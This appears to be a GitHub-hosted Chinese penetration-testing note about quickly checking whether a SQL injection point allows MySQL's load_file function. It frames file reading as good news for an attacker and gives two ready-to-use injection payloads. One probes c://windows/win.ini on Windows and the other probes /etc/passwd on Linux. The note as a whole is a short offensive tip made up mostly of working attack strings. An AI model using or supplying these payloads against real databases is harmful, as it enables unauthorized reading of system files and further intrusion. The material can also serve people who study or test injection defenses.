Skip to content

Latest commit

 

History

History
16 lines (10 loc) · 404 Bytes

快速判断sql注入点是否支持load_file.md

File metadata and controls

16 lines (10 loc) · 404 Bytes

在sql注入点中,如果一个注入点支持load_file函数来读取文件的话,无疑对我们进行渗透来说是一个好消息

分享一下一条语句检测是否支持load_file读取文件

Windows 注入点判断文件是否存在

1 and 1=if(ascii(mid(load_file('c://windows/win.ini'),1,1))>0,1,2)

Linux

1 and 1=if(ascii(mid(load_file('/etc/passwd'),1,1))>0,1,2)